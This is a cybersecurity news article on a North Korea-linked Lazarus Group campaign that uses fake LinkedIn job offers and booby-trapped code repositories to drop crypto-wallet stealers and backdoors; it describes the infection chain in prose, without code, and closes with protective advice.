The notorious North Korea-linked Lazarus Group has launched a sophisticated cross-platform cyberattack that exploits fake LinkedIn job offers to infiltrate Windows, macOS, and Linux systems. This latest campaign specifically targets professionals in the cryptocurrency and travel sectors, using social engineering tactics to deploy a powerful JavaScript-based information stealer.
How the Lazarus Group's Scam Unfolds
According to cybersecurity firm Bitdefender, the attack begins with fraudulent job offers sent via LinkedIn. Victims are lured with promises of remote work, flexible hours, and high salaries.
Once the target expresses interest, the fake recruiter requests a CV or a GitHub repository link, which serves as an entry point to gather personal data and make the scam appear legitimate.
The next stage of the attack involves sharing a GitHub or Bitbucket repository containing a supposed Minimum Viable Product (MVP) of a decentralized exchange (DEX) project. The victim is encouraged to review the project and provide feedback.
Hidden Malware Within the Code
Buried within the repository's code is an obfuscated JavaScript script that fetches a next-stage payload from api.npoint[.]io. This malicious script functions as a:
JavaScript information stealer, harvesting data from cryptocurrency wallet extensions installed on the victim's browser.
Malware loader, which deploys a Python-based backdoor designed to monitor clipboard activity, maintain persistent remote access, and drop additional malware.
Connection to Contagious Interview Malware Cluster
Bitdefender researchers have identified tactical overlaps between this campaign and the well-documented Contagious Interview cluster (aka DeceptiveDevelopment, DEV#POPPER). This attack chain has been linked to malware strains such as:
BeaverTail (JavaScript Stealer) – Extracts sensitive browser data before executing further payloads.
InvisibleFerret (Python Implant) – Functions as a stealthy backdoor for prolonged system compromise.
Multi-Layered Infection Chain
The Lazarus Group employs an advanced multi-layered infection technique, leveraging different programming languages and technologies:
JavaScript Stealer – Extracts crypto wallet data and browser information.
Python-Based Malware – Installs a .NET binary that communicates with a TOR-based command-and-control (C2) server.
Crypto Miner Deployment – The malware ultimately delivers a payload that steals sensitive data, logs keystrokes, and launches cryptocurrency mining operations.
Widespread Impact and Evolution of the Campaign
Reports from LinkedIn and Reddit suggest that this campaign is rapidly evolving. Attackers modify their tactics slightly for each victim, sometimes asking them to clone a Web3 repository or debug faulty code as part of a fake hiring process.
A now-deleted Bitbucket repository linked to the campaign was labeled "miketoken_v2." Bitdefender believes that Lazarus is recycling repository names and recruiter identities to keep the attack active and evade detection.
New Malware Variant: FlexibleFerret
This disclosure comes just a day after SentinelOne reported that the Contagious Interview campaign is also deploying a new malware variant, FlexibleFerret, further demonstrating Lazarus Group's continuous adaptation and evolution in their cyberattacks.
Protect Yourself Against Lazarus Group’s Cyber Threats
To stay secure from these highly targeted cryptocurrency-related cyberattacks, cybersecurity experts recommend:
Verifying job offers – Be skeptical of recruiters requesting sensitive data or GitHub repositories.
Avoiding unverified repositories – Do not download or execute code from unknown sources.
Using advanced security tools – Enable multi-factor authentication (MFA) and keep security software updated.
Monitoring clipboard activity – Cybercriminals often exploit clipboard data to steal crypto wallet credentials.
The Lazarus Group continues to innovate and refine its attack methodologies, making it essential for individuals and organizations to remain vigilant against social engineering and malware threats in the cryptocurrency space.
